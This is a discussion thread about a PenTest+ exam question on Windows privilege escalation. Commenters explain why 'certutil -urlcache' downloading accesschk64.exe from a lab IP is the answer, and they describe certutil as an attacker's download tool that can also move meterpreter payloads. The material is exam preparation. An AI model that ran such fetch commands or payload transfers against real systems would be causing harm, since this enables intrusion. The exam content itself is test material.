Exam PT1-002 topic 1 question 6 discussion

https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ --- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

Inviato da Copilot: The correct answer is A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe. The certutil -urlcache -split -f command in Windows is used to download files from a specified URL. In this case, it’s being used to download the accesschk64.exe file from the provided URL. accesschk64.exe is a command-line tool for viewing the effective permissions on files, registry keys, services, processes, kernel objects, and more. This can be useful for a penetration tester to identify misconfigured service permissions. Please note that this is a potentially dangerous operation and should only be performed in a controlled and legal testing environment. Unauthorized penetration testing can be illegal and unethical. Always obtain proper authorization before conducting any penetration testing activities.

Option A is using the "certutil" command to download and save the AccessChk tool on the target machine. AccessChk can be used to check the permissions of services and other objects on the Windows system, and can help identify misconfigured permissions that may be exploited by an attacker. Option B is using a PowerShell command to upload a file to a remote server, which is not relevant to the task at hand. Option C is using the "schtasks" command to display information about scheduled tasks, which is also not relevant to the task at hand. Option D is using the "wget" command to download the AccessChk tool, which is similar to option A but is using a different command. However, "wget" is not a native Windows command and may not be available on the target system, whereas "certutil" is a native Windows command that should be available on most Windows systems.

Good info here from SentinalOne on how attackers can use Certutil.exe - CertUtil.exe is an admin command line tool intended by Microsoft to be used for manipulating certification authority (CA) data and components. This includes verifying certificates and certificate chains, dumping and displaying CA configuration information and configuring Certificate Services. How Attackers Use CertUtil CertUtil can replace PowerShell for specific tasks such as downloading a file from a remote URL and encoding and decoding a Base64 obfuscated payload. Note the -urlcache verb that can be employed for this purpose: See link: https://www.sentinelone.com/blog/malware-living-off-land-with-certutil/

This one is tough. My best guess is the Certutil as it is a known service vulnerability in which a standard user can capitalize on write permissions to a root/system level access and replace the file/executable with a malicious link. @luca76cap has a good answer. I read a bunch of articles, but this one helped the most: https://outrunsec.com/tag/certutil/ "Now we will transfer the meterpreter payload using Certutil. This is a built-in utility included on most Windows operating systems and my go-to tool for windows file transfers." A penetration tester has obtained a low-privilege shell on a Windows server with a DEFAULT CONFIGURATION and now wants to explore the ability to exploit MISCONFIGURED SERVICE PERMISSIONS. Which of the following commands would help the tester START this process?